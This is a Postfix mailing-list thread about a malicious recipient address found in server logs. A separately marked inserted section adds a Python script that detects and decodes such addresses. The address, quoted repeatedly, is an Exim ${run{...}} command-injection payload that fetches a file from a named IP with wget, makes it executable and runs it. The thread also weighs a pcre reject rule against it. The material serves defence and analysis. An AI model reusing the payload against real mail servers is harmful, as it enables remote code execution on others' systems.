command injection by crafted recipient address

command injection by crafted recipient address

kris_h
Hey

I found this crazy recipient address in my Postfix logs:

root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost

Seems that someone tries to download something with wget, then chmod 'x'
and finally execute the downloaded crap.

Is there any chance that Postfix executes such crazy stuff - maybe in PCRE
or regex or somewhere else?

Is there any unexpected side effect when I add  /\$\{/  REJECT in a
check_recipient_access pcre file?

thanks in advance

Kris



--
Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html
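
The following is an added example for the log line quoted above; it is not part of the original thread and is not Postfix or Exim code. It is a small Python triage script that pulls the envelope recipient out of Postfix log lines, flags every address that the pcre rule /\$\{/ REJECT discussed here would match, and decodes the Exim-style \xHH escapes inside the ${run{...}} payload so the command can be read. The log lines are constructed (hostname, client IP, queue ID and the benign addresses are made up); only the suspicious recipient address is the one quoted above. The decoder assumes that the backslashes of the \xHH escapes were lost in logging or posting (the quoted address shows x2F rather than \x2F), so it accepts both forms; the stray "t" characters between "sh", "-c" and the opening quote are presumably stripped \t escapes and are left untouched.

```python
import re

# Constructed sample Postfix log lines. Hostname, client IP, queue ID and
# the benign addresses are made up; the first recipient address is the one
# quoted in the original post.
SAMPLE_LOG = """\
Mar 12 16:40:01 mx1 postfix/smtpd[12345]: NOQUEUE: reject: RCPT from unknown[198.51.100.23]: 554 5.7.1 <root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost>: Recipient address rejected: Access denied; from=<> to=<root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost> proto=ESMTP helo=<x>
Mar 12 16:41:09 mx1 postfix/qmgr[1200]: 4B2C1D3E: from=<alice@example.org>, size=2048, nrcpt=1 (queue active)
Mar 12 16:41:09 mx1 postfix/smtp[12346]: 4B2C1D3E: to=<bob+invoices@example.net>, relay=example.net[203.0.113.5]:25, delay=0.4, status=sent (250 2.0.0 OK)
"""

# Same expression as the pcre access-map line "/\$\{/ REJECT". "${" opens
# Exim's string-expansion syntax and has no business in a recipient address.
RECIPIENT_RULE = re.compile(r"\$\{")

# Postfix writes the envelope recipient as to=<address> both in smtpd
# reject lines and in delivery-agent lines.
RCPT_FIELD = re.compile(r"\bto=<([^>]*)>")

# Exim's \xHH escapes. The backslash is optional because the posted log line
# shows the escapes without it (assumption: lost in logging or posting).
HEX_ESCAPE = re.compile(r"\\?x([0-9A-Fa-f]{2})")


def would_reject(address):
    """True if the address matches the "${" rule, i.e. the map returns REJECT."""
    return RECIPIENT_RULE.search(address) is not None


def decode_exim_escapes(text):
    """Turn x2F / \\x2F style escapes back into characters so the payload can be read.

    For reading flagged addresses only: applied to arbitrary text it would
    also rewrite harmless sequences such as the "x20" in "box20".
    """
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_log(log_text):
    """Return (raw_address, decoded_address) for every recipient the rule would reject."""
    hits = []
    for line in log_text.splitlines():
        for address in RCPT_FIELD.findall(line):
            if would_reject(address):
                hits.append((address, decode_exim_escapes(address)))
    return hits


if __name__ == "__main__":
    for raw, decoded in scan_log(SAMPLE_LOG):
        print("rejected by rule:", raw)
        print("decoded payload: ", decoded)
```

Run against the constructed lines, the script flags only the quoted address and decodes its payload to a wget / chmod +x / execute sequence. The regex is the same one the pcre map would use, so this also shows the limit of the rule: it catches only addresses carrying Exim's "${" syntax, which is why the thread treats it as a stop-gap rather than a permanent deny rule.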

Re: [External] command injection by crafted recipient address

Kevin A. McGrail

On 3/12/2020 4:40 PM, kris_h wrote:
> root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost

It's an exim exploit.  See CVE-2019-15846.

Regards,

KAM


Re: [External] command injection by crafted recipient address

kris_h

> It's an exim exploit.  See CVE-2019-15846.

@KAM
Thanks a lot for this really quick reply!


Re: [External] command injection by crafted recipient address

Wietse Venema
Kevin A. McGrail:
>
> On 3/12/2020 4:40 PM, kris_h wrote:
> > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost
>
> It's an exim exploit. See CVE-2019-15846.

The above is very similar to the Exim exploit for CVE-2019-10149 in
https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt

CVE-2019-15846 is related to a bug in Exim SNI support.

        Wietse

Re: [External] command injection by crafted recipient address

kris_h
Hey Wietse,

thank you for this clarification.

What do you think about using the reject-recipient /\$\{/-rule?

Kris


Re: [External] command injection by crafted recipient address

Wietse Venema
kris_h:
> Hey Wietse,
>
> thank you for this clarification.
>
> What do you think about using the reject-recipient /\$\{/-rule?

As a temporary rule, it may have made sense when the Exim bug was new.

As a permanent 'deny' rule, it won't block new exploits.

        Wietse

Re: [External] command injection by crafted recipient address

kris_h

> As a temporary rule, it may have made sense when the Exim bug was new.
> As a permanent 'deny' rule, it won't block new exploits.

Yes, you're right, each additional PCRE rule is one more to be passed for each
recipient...

Thanks

Kris


Re: [External] command injection by crafted recipient address

Joe Acquisto-j4
>>>
> kris_h:
>> Hey Wietse,
>>
>> thank you for this clarification.
>>
>> What do you think about using the reject-recipient /\$\{/-rule?
>
> As a temporary rule, it may have made sense when the Exim bug was new.
>
> As a permanent 'deny' rule, it won't block new exploits.
>
> Wietse

Seems these exploits are only a concern if Exim is installed?  Or am I mistaken?



---------------------------------
       j4computers, llc
   Stone Ridge, NY 12484
        845-687-3734
   www.j4computers.com
---------------------------------

Re: [External] command injection by crafted recipient address

Wietse Venema
Joe Acquisto-j4:

> >>>
> > kris_h:
> >> Hey Wietse,
> >>
> >> thank you for this clarification.
> >>
> >> What do you think about using the reject-recipient /\$\{/-rule?
> >
> > As a temporary rule, it may have made sense when the Exim bug was new.
> >
> > As a permanent 'deny' rule, it won't block new exploits.
>
> Seems these exploits only a concern if Exim is installed?  Or am I mistaken?

It could be an indirect attack: attacker -> Postfix -> Exim.
Hence, the filter may be useful while the bug is exploitable.

        Wietse